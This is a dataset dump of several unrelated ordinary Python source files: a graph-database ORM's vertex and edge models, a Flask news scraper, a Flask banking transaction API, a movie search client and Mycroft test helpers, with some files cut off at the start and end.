in self._columns.items():\n # Determine the save strategy for this column\n should_save = True\n\n col_strategy = self.__default_save_strategy__\n if col.has_save_strategy:\n col_strategy = col.get_save_strategy()\n\n # Enforce the save strategy\n if col_strategy == columns.SAVE_ONCE:\n if was_saved:\n if self._values[name].changed:\n raise SaveStrategyException(\"Attempt to change column '{}' with save strategy SAVE_ONCE\".format(name))\n else:\n should_save = False\n elif col_strategy == columns.SAVE_ONCHANGE:\n if was_saved and not self._values[name].changed:\n should_save = False\n \n if should_save:\n values[name] = col.to_database(getattr(self, name, None))\n \n return values\n\n @classmethod\n def create(cls, *args, **kwargs):\n \"\"\"Create a new element with the given information.\"\"\"\n return cls(*args, **kwargs).save()\n \n def pre_save(self):\n \"\"\"Pre-save hook which is run before saving an element\"\"\"\n self.validate()\n \n def save(self):\n \"\"\"\n Base class save method. 
Performs basic validation and error handling.\n \"\"\"\n if self.__abstract__:\n raise ThunderdomeException('cant save abstract elements')\n self.pre_save()\n return self\n\n def pre_update(self, **values):\n \"\"\" Override this to perform pre-update validation \"\"\"\n pass\n\n def update(self, **values):\n \"\"\"\n performs an update of this element with the given values and returns the saved object\n \"\"\"\n if self.__abstract__:\n raise ThunderdomeException('cant update abstract elements')\n self.pre_update(**values)\n for key in values.keys():\n if key not in self._columns:\n raise TypeError(\"unrecognized attribute name: '{}'\".format(key))\n\n for k,v in values.items():\n setattr(self, k, v)\n\n return self.save()\n\n def _reload_values(self):\n \"\"\"\n Base method for reloading an element from the database.\n \"\"\"\n raise NotImplementedError\n\n def reload(self):\n \"\"\"\n Reload the given element from the database.\n \"\"\"\n values = self._reload_values()\n for name, column in self._columns.items():\n value = values.get(name, None)\n if value is not None: value = column.to_python(value)\n setattr(self, name, value)\n return self\n\n \nclass ElementMetaClass(type):\n \"\"\"Metaclass for all graph elements\"\"\"\n \n def __new__(cls, name, bases, attrs):\n \"\"\"\n \"\"\"\n #move column definitions into columns dict\n #and set default column names\n column_dict = OrderedDict()\n \n #get inherited properties\n for base in bases:\n for k,v in getattr(base, '_columns', {}).items():\n column_dict.setdefault(k,v)\n\n def _transform_column(col_name, col_obj):\n column_dict[col_name] = col_obj\n col_obj.set_column_name(col_name)\n #set properties\n _get = lambda self: self._values[col_name].getval()\n _set = lambda self, val: self._values[col_name].setval(val)\n _del = lambda self: self._values[col_name].delval()\n if col_obj.can_delete:\n attrs[col_name] = property(_get, _set)\n else:\n attrs[col_name] = property(_get, _set, _del)\n\n column_definitions = [(k,v) for k,v in attrs.items() if isinstance(v, columns.Column)]\n column_definitions = sorted(column_definitions, lambda x,y: cmp(x[1].position, y[1].position))\n \n #TODO: check that the defined columns don't conflict with any of the Model API's existing attributes/methods\n #transform column definitions\n for k,v in column_definitions:\n _transform_column(k,v)\n \n #check for duplicate column names\n col_names = set()\n for v in column_dict.values():\n if v.db_field_name in col_names:\n raise ModelException(\"{} defines the column {} more than once\".format(name, v.db_field_name))\n col_names.add(v.db_field_name)\n\n #create db_name -> model name map for loading\n db_map = {}\n for field_name, col in column_dict.items():\n db_map[col.db_field_name] = field_name\n\n #add management members to the class\n attrs['_columns'] = column_dict\n attrs['_db_map'] = db_map\n \n #auto link gremlin methods\n gremlin_methods = {}\n \n #get inherited gremlin methods\n for base in bases:\n for k,v in getattr(base, '_gremlin_methods', {}).items():\n gremlin_methods.setdefault(k, v)\n\n #short circuit __abstract__ inheritance\n attrs['__abstract__'] = attrs.get('__abstract__', False)\n \n #short circuit path inheritance\n gremlin_path = attrs.get('gremlin_path')\n attrs['gremlin_path'] = gremlin_path\n\n def wrap_method(method):\n def method_wrapper(self, *args, **kwargs):\n return method(self, *args, **kwargs)\n return method_wrapper\n \n for k,v in attrs.items():\n if isinstance(v, BaseGremlinMethod):\n gremlin_methods[k] = v\n method = 
wrap_method(v)\n attrs[k] = method\n if v.classmethod: attrs[k] = classmethod(method)\n if v.property: attrs[k] = property(method)\n\n attrs['_gremlin_methods'] = gremlin_methods\n\n #create the class and add a QuerySet to it\n klass = super(ElementMetaClass, cls).__new__(cls, name, bases, attrs)\n \n #configure the gremlin methods\n for name, method in gremlin_methods.items():\n method.configure_method(klass, name, gremlin_path)\n \n return klass\n\n\nclass Element(BaseElement):\n \"\"\"\n the db name for the column family can be set as the attribute db_name, or\n it will be generated from the class name\n \"\"\"\n __metaclass__ = ElementMetaClass\n \n @classmethod\n def deserialize(cls, data):\n \"\"\"\n Deserializes rexster json into vertex or edge objects\n \"\"\"\n dtype = data.get('_type')\n if dtype == 'vertex':\n vertex_type = data['element_type']\n return vertex_types[vertex_type](**data)\n elif dtype == 'edge':\n edge_type = data['_label']\n return edge_types[edge_type](data['_outV'], data['_inV'], **data)\n else:\n raise TypeError(\"Can't deserialize '{}'\".format(dtype))\n \n \nclass VertexMetaClass(ElementMetaClass):\n \"\"\"Metaclass for vertices.\"\"\"\n \n def __new__(cls, name, bases, attrs):\n\n #short circuit element_type inheritance\n attrs['element_type'] = attrs.pop('element_type', None)\n\n klass = super(VertexMetaClass, cls).__new__(cls, name, bases, attrs)\n\n if not klass.__abstract__:\n element_type = klass.get_element_type()\n if element_type in vertex_types and str(vertex_types[element_type]) != str(klass):\n raise ElementDefinitionException('{} is already registered as a vertex'.format(element_type))\n vertex_types[element_type] = klass\n\n #index requested indexed columns\n klass._create_indices()\n\n return klass\n\n \nclass Vertex(Element):\n \"\"\"\n The Vertex model base class. All vertexes have a vid defined on them, the element type is autogenerated\n from the subclass name, but can optionally be set manually\n \"\"\"\n __metaclass__ = VertexMetaClass\n __abstract__ = True\n\n gremlin_path = 'vertex.groovy'\n\n _save_vertex = GremlinMethod()\n _traversal = GremlinMethod()\n _delete_related = GremlinMethod()\n\n #vertex id\n vid = columns.UUID(save_strategy=columns.SAVE_ONCE)\n \n element_type = None\n\n @classmethod\n def _create_indices(cls):\n \"\"\"\n Creates this model's indices. This will be skipped if connection.setup hasn't been\n called, but connection.setup calls this method on existing vertices\n \"\"\"\n from thunderdome.connection import _hosts, _index_all_fields, create_key_index\n \n if not _hosts: return\n for column in cls._columns.values():\n if column.index or _index_all_fields:\n create_key_index(column.db_field_name)\n \n @classmethod\n def get_element_type(cls):\n \"\"\"\n Returns the element type for this vertex.\n\n :rtype: str\n \n \"\"\"\n return cls._type_name(cls.element_type)\n \n @classmethod\n def all(cls, vids, as_dict=False):\n \"\"\"\n Load all vertices with the given vids from the graph. 
By default this\n        will return a list of vertices but if as_dict is True then it will\n        return a dictionary containing vids as keys and vertices found as values.\n\n        :param vids: A list of vids\n        :type vids: list\n        :param as_dict: Toggle whether or not to return a dictionary or list\n        :type as_dict: boolean\n        :rtype: dict or list\n        \n        \"\"\"\n        if not isinstance(vids, (list, tuple)):\n            raise ThunderdomeQueryError(\"vids must be of type list or tuple\")\n        \n        strvids = [str(v) for v in vids]\n        qs = ['vids.collect{g.V(\"vid\", it).toList()[0]}']\n        \n        results = execute_query('\\n'.join(qs), {'vids':strvids})\n        results = filter(None, results)\n        \n        if len(results) != len(vids):\n            raise ThunderdomeQueryError(\"the number of results doesn't match the number of vids requested\")\n        \n        objects = []\n        for r in results:\n            try:\n                objects += [Element.deserialize(r)]\n            except KeyError:\n                raise ThunderdomeQueryError('Vertex type \"{}\" is unknown'.format(r.get('element_type')))\n        \n        if as_dict:\n            return {v.vid:v for v in objects}\n        \n        return objects\n\n    def _reload_values(self):\n        \"\"\"\n        Method for reloading the current vertex by reading its current values\n        from the database.\n        \"\"\"\n        results = execute_query('g.v(eid)', {'eid':self.eid})[0]\n        del results['_id']\n        del results['_type']\n        return results\n\n    @classmethod\n    def get(cls, vid):\n        \"\"\"\n        Look up vertex by thunderdome assigned UUID. Raises a DoesNotExist\n        exception if a vertex with the given vid was not found. Raises a\n        MultipleObjectsReturned exception if the vid corresponds to more\n        than one vertex in the graph.\n\n        :param vid: The thunderdome assigned UUID\n        :type vid: str\n        :rtype: thunderdome.models.Vertex\n        \n        \"\"\"\n        try:\n            results = cls.all([vid])\n            if len(results) > 1:\n                raise cls.MultipleObjectsReturned\n\n            result = results[0]\n            if not isinstance(result, cls):\n                raise WrongElementType(\n                    '{} is not an instance or subclass of {}'.format(result.__class__.__name__, cls.__name__)\n                )\n            return result\n        except ThunderdomeQueryError:\n            raise cls.DoesNotExist\n        \n    @classmethod\n    def get_by_eid(cls, eid):\n        \"\"\"\n        Look up a vertex by its Titan-specific id (eid). 
Raises a DoesNotExist\n exception if a vertex with the given eid was not found.\n\n :param eid: The numeric Titan-specific id\n :type eid: int\n :rtype: thunderdome.models.Vertex\n \n \"\"\"\n results = execute_query('g.v(eid)', {'eid':eid})\n if not results:\n raise cls.DoesNotExist\n return Element.deserialize(results[0])\n \n def save(self, *args, **kwargs):\n \"\"\"\n Save the current vertex using the configured save strategy, the default\n save strategy is to re-save all fields every time the object is saved.\n \"\"\"\n super(Vertex, self).save(*args, **kwargs)\n params = self.as_save_params()\n params['element_type'] = self.get_element_type()\n result = self._save_vertex(params)[0]\n self.eid = result.eid\n for k,v in self._values.items():\n v.previous_value = result._values[k].previous_value\n return result\n \n def delete(self):\n \"\"\"\n Delete the current vertex from the graph.\n \"\"\"\n if self.__abstract__:\n raise ThunderdomeException('cant delete abstract elements')\n if self.eid is None:\n return self\n query = \"\"\"\n g.removeVertex(g.v(eid))\n g.stopTransaction(SUCCESS)\n \"\"\"\n results = execute_query(query, {'eid': self.eid})\n \n def _simple_traversal(self,\n operation,\n label,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Perform simple graph database traversals with ubiquitous pagination.\n\n :param operation: The operation to be performed\n :type operation: str\n :param label: The edge label to be used\n :type label: str or Edge\n :param start: The starting offset\n :type start: int\n :param max_results: The maximum number of results to return\n :type max_results: int\n :param allowed_elements: The list of allowed result elements\n :type allowed_elements: list\n \n \"\"\"\n if inspect.isclass(label) and issubclass(label, Edge):\n label = label.get_label()\n elif isinstance(label, Edge):\n label = label.get_label()\n\n allowed_elts = None\n if allowed_elements is not None:\n allowed_elts = []\n for e in allowed_elements:\n if issubclass(e, Vertex):\n allowed_elts += [e.get_element_type()]\n elif issubclass(e, Edge):\n allowed_elts += [e.get_label()]\n\n if limit is not None and offset is not None:\n start = offset\n end = offset + limit\n else:\n start = end = None\n \n return self._traversal(operation,\n label,\n start,\n end,\n allowed_elts)\n\n def _simple_deletion(self, operation, label):\n \"\"\"\n Perform simple bulk graph deletion operation.\n\n :param operation: The operation to be performed\n :type operation: str\n :param label: The edge label to be used\n :type label: str or Edge\n \n \"\"\"\n if inspect.isclass(label) and issubclass(label, Edge):\n label = label.get_label()\n elif isinstance(label, Edge):\n label = label.get_label()\n\n return self._delete_related(operation, label)\n\n def outV(self,\n label=None,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Return a list of vertices reached by traversing the outgoing edge\n with the given label.\n \n :param label: The edge label to be traversed\n :type label: str or BaseEdge\n :param limit: The number of the page to start returning results at\n :type limit: int or None\n :param offset: The maximum number of results to return\n :type offset: int or None\n :param allowed_elements: A list of allowed element types\n :type allowed_elements: list\n \n \"\"\"\n return self._simple_traversal('outV',\n label,\n limit,\n offset,\n allowed_elements)\n\n def inV(self,\n label=None,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Return a list of vertices 
reached by traversing the incoming edge\n with the given label.\n \n :param label: The edge label to be traversed\n :type label: str or BaseEdge\n :param limit: The number of the page to start returning results at\n :type limit: int or None\n :param offset: The maximum number of results to return\n :type offset: int or None\n :param allowed_elements: A list of allowed element types\n :type allowed_elements: list\n \n \"\"\"\n return self._simple_traversal('inV',\n label,\n limit,\n offset,\n allowed_elements)\n\n def outE(self,\n label=None,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Return a list of edges with the given label going out of this vertex.\n \n :param label: The edge label to be traversed\n :type label: str or BaseEdge\n :param limit: The number of the page to start returning results at\n :type limit: int or None\n :param offset: The maximum number of results to return\n :type offset: int or None\n :param allowed_elements: A list of allowed element types\n :type allowed_elements: list\n \n \"\"\"\n return self._simple_traversal('outE',\n label,\n limit,\n offset,\n allowed_elements)\n\n def inE(self,\n label=None,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Return a list of edges with the given label coming into this vertex.\n \n :param label: The edge label to be traversed\n :type label: str or BaseEdge\n :param limit: The number of the page to start returning results at\n :type limit: int or None\n :param offset: The maximum number of results to return\n :type offset: int or None\n :param allowed_elements: A list of allowed element types\n :type allowed_elements: list\n \n \"\"\"\n return self._simple_traversal('inE',\n label,\n limit,\n offset,\n allowed_elements)\n\n def bothE(self,\n label=None,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Return a list of edges both incoming and outgoing from this vertex.\n\n :param label: The edge label to be traversed (optional)\n :type label: str or BaseEdge or None\n :param limit: The number of the page to start returning results at\n :type limit: int or None\n :param offset: The maximum number of results to return\n :type offset: int or None\n :param allowed_elements: A list of allowed element types\n :type allowed_elements: list\n \n \"\"\"\n return self._simple_traversal('bothE',\n label,\n limit,\n offset,\n allowed_elements)\n \n def bothV(self,\n label=None,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Return a list of vertices both incoming and outgoing from this vertex.\n\n :param label: The edge label to be traversed (optional)\n :type label: str or BaseEdge or None\n :param limit: The number of the page to start returning results at\n :type limit: int or None\n :param offset: The maximum number of results to return\n :type offset: int or None\n :param allowed_elements: A list of allowed element types\n :type allowed_elements: list\n \n \"\"\"\n return self._simple_traversal('bothV',\n label,\n limit,\n offset,\n allowed_elements)\n\n\n def delete_outE(self, label=None):\n \"\"\"Delete all outgoing edges with the given label.\"\"\"\n self._simple_deletion('outE', label)\n\n def delete_inE(self, label=None):\n \"\"\"Delete all incoming edges with the given label.\"\"\"\n self._simple_deletion('inE', label)\n\n def delete_outV(self, label=None):\n \"\"\"Delete all outgoing vertices connected with edges with the given label.\"\"\"\n self._simple_deletion('outV', label)\n\n def delete_inV(self, label=None):\n \"\"\"Delete all incoming vertices 
connected with edges with the given label.\"\"\"\n self._simple_deletion('inV', label)\n \n \ndef to_offset(page_num, per_page):\n \"\"\"\n Convert a page_num and per_page to offset.\n\n :param page_num: The current page number\n :type page_num: int\n :param per_page: The maximum number of results per page\n :type per_page: int\n :rtype: int\n \n \"\"\"\n if page_num and per_page:\n return (page_num-1) * per_page\n else:\n return None\n \n \nclass PaginatedVertex(Vertex):\n \"\"\"\n Convenience class to easily handle pagination for traversals\n \"\"\"\n __abstract__ = True\n def outV(self,\n label=None,\n page_num=None,\n per_page=None,\n allowed_elements=None):\n return super(PaginatedVertex, self).outV(label, per_page, to_offset(page_num, per_page), allowed_elements)\n \n def outE(self,\n label=None,\n page_num=None,\n per_page=None,\n allowed_elements=None):\n return super(PaginatedVertex, self).outE(label, per_page, to_offset(page_num, per_page), allowed_elements)\n \n def inV(self,\n label=None,\n page_num=None,\n per_page=None,\n allowed_elements=None):\n return super(PaginatedVertex, self).inV(label, per_page, to_offset(page_num, per_page), allowed_elements)\n \n def inE(self,\n label=None,\n page_num=None,\n per_page=None,\n allowed_elements=None):\n return super(PaginatedVertex, self).inE(label, per_page, to_offset(page_num, per_page), allowed_elements)\n \n def bothV(self,\n label=None,\n page_num=None,\n per_page=None,\n allowed_elements=None):\n return super(PaginatedVertex, self).bothV(label, per_page, to_offset(page_num, per_page), allowed_elements)\n \n def bothE(self,\n label=None,\n page_num=None,\n per_page=None,\n allowed_elements=None):\n return super(PaginatedVertex, self).bothE(label, per_page, to_offset(page_num, per_page), allowed_elements)\n \n \nclass EdgeMetaClass(ElementMetaClass):\n \"\"\"Metaclass for edges.\"\"\"\n \n def __new__(cls, name, bases, attrs):\n #short circuit element_type inheritance\n attrs['label'] = attrs.pop('label', None)\n\n klass = super(EdgeMetaClass, cls).__new__(cls, name, bases, attrs)\n\n if not klass.__abstract__:\n label = klass.get_label()\n if label in edge_types and str(edge_types[label]) != str(klass):\n raise ElementDefinitionException('{} is already registered as an edge'.format(label))\n edge_types[klass.get_label()] = klass\n return klass\n\n \nclass Edge(Element):\n \"\"\"Base class for all edges.\"\"\"\n \n __metaclass__ = EdgeMetaClass\n __abstract__ = True\n\n # if set to True, no more than one edge will\n # be created between two vertices\n __exclusive__ = False\n \n label = None\n \n gremlin_path = 'edge.groovy'\n \n _save_edge = GremlinMethod()\n _get_edges_between = GremlinMethod(classmethod=True)\n \n def __init__(self, outV, inV, **values):\n \"\"\"\n Initialize this edge with the outgoing and incoming vertices as well\n as edge properties.\n\n :param outV: The vertex this edge is coming out of\n :type outV: Vertex\n :param inV: The vertex this edge is going into\n :type inV: Vertex\n :param values: The properties for this edge\n :type values: dict\n \n \"\"\"\n self._outV = outV\n self._inV = inV\n super(Edge, self).__init__(**values)\n \n @classmethod\n def get_label(cls):\n \"\"\"\n Returns the label for this edge.\n\n :rtype: str\n \n \"\"\"\n return cls._type_name(cls.label)\n \n @classmethod\n def get_between(cls, outV, inV, page_num=None, per_page=None):\n \"\"\"\n Return all the edges with a given label between two vertices.\n \n :param outV: The vertex the edge comes out of.\n :type outV: Vertex\n :param 
inV: The vertex the edge goes into.\n :type inV: Vertex\n :param page_num: The page number of the results\n :type page_num: int\n :param per_page: The number of results per page\n :type per_page : int\n :rtype: list\n \n \"\"\"\n return cls._get_edges_between(outV=outV, inV=inV,\n label=cls.get_label(),\n page_num=page_num,\n per_page=per_page)\n \n def validate(self):\n \"\"\"\n Perform validation of this edge raising a ValidationError if any problems\n are encountered.\n \"\"\"\n if self.eid is None:\n if self._inV is None:\n raise ValidationError('in vertex must be set before saving new edges')\n if self._outV is None:\n raise ValidationError('out vertex must be set before saving new edges')\n super(Edge, self).validate()\n \n def save(self, *args, **kwargs):\n \"\"\"\n Save this edge to the graph database.\n \"\"\"\n super(Edge, self).save(*args, **kwargs)\n return self._save_edge(self._outV,\n self._inV,\n self.get_label(),\n self.as_save_params(),\n exclusive=self.__exclusive__)[0]\n\n def _reload_values(self):\n \"\"\"\n Re-read the values for this edge from the graph database.\n \"\"\"\n results = execute_query('g.e(eid)', {'eid':self.eid})[0]\n del results['_id']\n del results['_type']\n return results\n\n @classmethod\n def get_by_eid(cls, eid):\n \"\"\"\n Return the edge with the given Titan-specific eid. Raises a\n DoesNotExist exception if no edge is found.\n\n :param eid: The Titan-specific edge id (eid)\n :type eid: int\n \n \"\"\"\n results = execute_query('g.e(eid)', {'eid':eid})\n if not results:\n raise cls.DoesNotExist\n return Element.deserialize(results[0])\n\n @classmethod\n def create(cls, outV, inV, *args, **kwargs):\n \"\"\"\n Create a new edge of the current type coming out of vertex outV and\n going into vertex inV with the given properties.\n\n :param outV: The vertex the edge is coming out of\n :type outV: Vertex\n :param inV: The vertex the edge is going into\n :type inV: Vertex\n \n \"\"\"\n return super(Edge, cls).create(outV, inV, *args, **kwargs)\n \n def delete(self):\n \"\"\"\n Delete the current edge from the graph.\n \"\"\"\n if self.__abstract__:\n raise ThunderdomeException('cant delete abstract elements')\n if self.eid is None:\n return self\n query = \"\"\"\n g.removeEdge(g.e(eid))\n g.stopTransaction(SUCCESS)\n \"\"\"\n results = execute_query(query, {'eid':self.eid})\n\n def _simple_traversal(self, operation):\n \"\"\"\n Perform a simple traversal starting from the current edge returning a\n list of results.\n\n :param operation: The operation to be performed\n :type operation: str\n :rtype: list\n \n \"\"\"\n results = execute_query('g.e(eid).%s()'%operation, {'eid':self.eid})\n return [Element.deserialize(r) for r in results]\n \n def inV(self):\n \"\"\"\n Return the vertex that this edge goes into.\n\n :rtype: Vertex\n \n \"\"\"\n if self._inV is None:\n self._inV = self._simple_traversal('inV')\n elif isinstance(self._inV, (int, long)):\n self._inV = Vertex.get_by_eid(self._inV)\n return self._inV\n \n def outV(self):\n \"\"\"\n Return the vertex that this edge is coming out of.\n\n :rtype: Vertex\n \n \"\"\"\n if self._outV is None:\n self._outV = self._simple_traversal('outV')\n elif isinstance(self._outV, (int, long)):\n self._outV = Vertex.get_by_eid(self._outV)\n return self._outV\n","sub_path":"thunderdome/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":33772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"511472302","text":"import requests\nfrom bs4 import 
BeautifulSoup\n\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n    return render_template('index.html')\n\n\n@app.route('/detik-pop')\ndef detik_pop():\n    url = 'https://www.detik.com/terpopuler'\n    rs = requests.get(url, params={'tag_from': 'framebar'})\n\n    sp = BeautifulSoup(rs.text, 'html.parser')\n\n    pop_area = sp.find(attrs={'class': 'grid-row list-content'})\n\n    judul = pop_area.findAll(attrs={'class': 'media__title'})\n    foto = pop_area.findAll(attrs={'class': 'media__image'})\n\n    return render_template('index.html', gambar=foto)\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"399225306","text":"'''\n*****TRANSACTION API******\n1. Create Transaction (interacts with the account API)\n2. Delete Transaction\n3. Get Transaction\n***********************\n'''\n\n\nfrom flask import Flask\nimport requests\nimport sys\nimport logging\nimport simplejson as json\nimport urllib\nfrom flask import request\nfrom flask import Response\nfrom flask import Blueprint\napp = Flask(__name__)\n\ndb = {\n    \"name\": \"http://cmpt756db:30002/api/v1/datastore\",\n    \"endpoint\": [\n        \"read\",\n        \"write\",\n        \"delete\",\n        \"update\"\n    ]\n}\nbp = Blueprint('app', __name__)\n@bp.route('/health')\ndef health():\n    return Response(\"\", status=200, mimetype=\"application/json\")\n\n@bp.route('/readiness')\ndef readiness():\n    return Response(\"\", status=200, mimetype=\"application/json\")\n\n@bp.route('/', methods=['GET'])\ndef list_all():\n    headers = request.headers\n    # check header here\n    if 'Authorization' not in headers:\n        return Response(json.dumps({\"error\": \"missing auth\"}), status=401, mimetype='application/json')\n    # list all transactions here\n    return {}\n\n@bp.route('/<transaction_id>', methods=['GET'])\ndef get_transaction(transaction_id):\n    headers = request.headers\n    # check header here\n    if 'Authorization' not in headers:\n        return Response(json.dumps({\"error\": \"missing auth\"}), status=401, mimetype='application/json')\n    payload = {\"objtype\": \"transaction\", \"objkey\": transaction_id}\n    url = db['name'] + '/' + db['endpoint'][0]\n    response = requests.get(url, params = payload, headers = {'Authorization': headers['Authorization']})\n    return (response.json())\n\n@bp.route('/', methods=['POST'])\n@bp.route('/', methods=['GET'])\n@bp.route('/', methods=['PUT'])\ndef create_transaction():\n    headers = request.headers\n    # check header here\n    if request.method == 'POST':\n        try:\n            content = request.get_json()\n            TransactionType = content['TransactionType']\n            AccountId = content['AccountId']\n            Amount = content['Amount']\n        except Exception:\n            return json.dumps({\"message\": \"error reading arguments\"})\n        url = db['name'] + '/' + db['endpoint'][1]\n        response0 = requests.post(url, json = {\"objtype\": \"transaction\", \"TransactionType\":TransactionType, \"AccountId\": AccountId, \"Amount\": Amount})\n        amount = content['Amount']\n        transactionType = content['TransactionType']\n        payload = {\"objtype\": \"account\", \"objkey\": content['AccountId']}\n        url = db['name'] + '/' + db['endpoint'][0]\n        response1 = requests.get(url, params = payload)\n        details = response1.json()\n        details = details['Items'][0]\n        account_id = details['account_id']\n        balance = details['Balance']\n        if transactionType == 'credit':\n            new_balance = balance + amount\n        else:\n            new_balance = balance - amount\n        url = db['name'] + '/' + db['endpoint'][3]\n        response = requests.put(url, params = {\"objtype\": \"account\", \"objkey\": account_id}, json = {\"Balance\": new_balance})\n        return (response0.json())\n
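The credit/debit branch above is the one piece of business logic in `create_transaction`; factored out as a pure function it becomes trivially unit-testable. A minimal sketch — the function name `apply_transaction` is mine, not part of the service:

```python
def apply_transaction(balance, amount, transaction_type):
    # 'credit' adds to the balance; anything else is treated as a debit,
    # mirroring the if/else inside create_transaction above.
    if transaction_type == 'credit':
        return balance + amount
    return balance - amount

assert apply_transaction(100, 30, 'credit') == 130
assert apply_transaction(100, 30, 'debit') == 70
```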
\n@bp.route('/<transaction_id>', methods=['DELETE'])\ndef delete_transaction(transaction_id):\n    headers = request.headers\n    # check header here\n    if 'Authorization' not in headers:\n        return Response(json.dumps({\"error\": \"missing auth\"}), status=401, mimetype='application/json')\n    url = db['name'] + '/' + db['endpoint'][2]\n    response = requests.delete(url, params = {\"objtype\": \"transaction\", \"objkey\": transaction_id}, headers = {'Authorization': headers['Authorization']})\n    return (response.json())\n\napp.register_blueprint(bp, url_prefix='/api/v1/transaction/')\n\nif __name__ == '__main__':\n    if len(sys.argv) < 2:\n        logging.error(\"missing port arg 1\")\n        sys.exit(-1)\n\n    p = int(sys.argv[1])\n    app.debug = True\n    app.run(host='0.0.0.0', port=p, threaded=True)\n","sub_path":"code/e-k8s/transaction/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"271611456","text":"import requests\nimport collections\n\n\nMovieResult = collections.namedtuple('MovieResult', 'rating, imdb_code, title, director, duration, year, imdb_score, '\n\t\t\t\t\t\t\t\t\t\t\t\t\t'keywords, genres')\n\n\ndef find_movies(search):\n\tif not search or not search.strip():\n\t\traise ValueError('Search text is required.')\n\n\turl = f'http://movie_service.talkpython.fm/api/search/{search}'\n\tresp = requests.get(url)\n\tresp.raise_for_status()\n\n\tmovie_data = resp.json()\n\tmovies_list = movie_data.get('hits')\n\n\tmovies = [MovieResult(**md) for md in movies_list]\n\n\tmovies.sort(key=lambda x: -x.year)\n\n\treturn movies\n","sub_path":"10_movie_search_app/movie_svc.py","file_name":"movie_svc.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"157065457","text":"# Copyright 2020 Mycroft AI Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"Common tools to use when creating step files for behave tests.\"\"\"\n\nfrom threading import Event\nimport time\n\nfrom mycroft.audio.utils import wait_while_speaking\nfrom mycroft.messagebus import Message\n\n\nDEFAULT_TIMEOUT = 10\n\n\nclass CriteriaWaiter:\n    \"\"\"Wait for a message to meet a certain criterion.\n\n    Args:\n        msg_type: message type to watch\n        criteria_func: Function to determine if a message fulfilling the\n            test case has been found.\n        context: behave context\n    \"\"\"\n    def __init__(self, msg_type, criteria_func, context):\n        self.msg_type = msg_type\n        self.criteria_func = criteria_func\n        self.context = context\n        self.result = Event()\n\n    def reset(self):\n        \"\"\"Reset the wait state.\"\"\"\n        self.result.clear()\n
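`CriteriaWaiter` is built around `threading.Event`: a consumer blocks on the event until a producer flags success (or a timeout expires). A stripped-down sketch of that pattern — the producer/consumer names here are illustrative, not Mycroft APIs:

```python
import threading
import time

result = threading.Event()

def producer():
    time.sleep(0.2)   # simulate a matching message arriving later
    result.set()      # corresponds to the criteria function matching

threading.Thread(target=producer).start()

# wait() returns True if set() happened before the timeout, else False --
# the same boolean CriteriaWaiter.wait_specific() ultimately reports.
print(result.wait(timeout=1.0))
```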
\n    # TODO: Remove in 21.08\n    def wait_unspecific(self, timeout):\n        \"\"\"\n        Wait for a specified time for criteria to be fulfilled by any message.\n\n        This use case is deprecated and exists only for backward compatibility.\n\n        Args:\n            timeout: Time allowance for a message fulfilling the criteria; if\n                     provided it will override the normal step timeout.\n\n        Returns:\n            tuple (bool, str) test status and debug output\n        \"\"\"\n        timeout = timeout or self.context.step_timeout\n        start_time = time.monotonic()\n        debug = ''\n        while time.monotonic() < start_time + timeout:\n            for message in self.context.bus.get_messages(None):\n                status, test_dbg = self.criteria_func(message)\n                debug += test_dbg\n                if status:\n                    self.context.matched_message = message\n                    self.context.bus.remove_message(message)\n                    return True, debug\n            self.context.bus.new_message_available.wait(0.5)\n        # Timed out; return debug from the test\n        return False, debug\n\n    def _check_historical_messages(self):\n        \"\"\"Search through the already received messages for a match.\n\n        Returns:\n            str: debug output\n\n        \"\"\"\n        debug = ''\n        for message in self.context.bus.get_messages(self.msg_type):\n            status, test_dbg = self.criteria_func(message)\n            debug += test_dbg\n            if status:\n                self.context.matched_message = message\n                self.context.bus.remove_message(message)\n                self.result.set()\n                break\n        return debug\n\n    def wait_specific(self, timeout=None):\n        \"\"\"Wait for a specific message type to fulfill a criterion.\n\n        Uses an event handler to avoid repeated polling.\n\n        Args:\n            timeout: Time allowance for a message fulfilling the criteria; if\n                     provided it will override the normal step timeout.\n\n        Returns:\n            tuple (bool, str) test status and debug output\n        \"\"\"\n        timeout = timeout or self.context.step_timeout\n\n        debug = ''\n\n        def on_message(message):\n            nonlocal debug\n            status, test_dbg = self.criteria_func(message)\n            debug += test_dbg\n            if status:\n                self.context.matched_message = message\n                self.result.set()\n\n        self.context.bus.on(self.msg_type, on_message)\n        # Check historical messages\n        historical_debug = self._check_historical_messages()\n\n        # If no matching message was already caught, wait for it\n        if not self.result.is_set():\n            self.result.wait(timeout=timeout)\n        self.context.bus.remove(self.msg_type, on_message)\n        return self.result.is_set(), historical_debug + debug\n\n    def wait(self, timeout=None):\n        \"\"\"Wait for a specific message type to fulfill a criterion.\n\n        Dispatches to the deprecated unspecific waiter or the specific one.\n\n        Args:\n            timeout: Time allowance for a message fulfilling the criteria; if\n                     provided it will override the normal step timeout.\n\n        Returns:\n            (result (bool), debug (str)) Result containing status and debug\n            message.\n        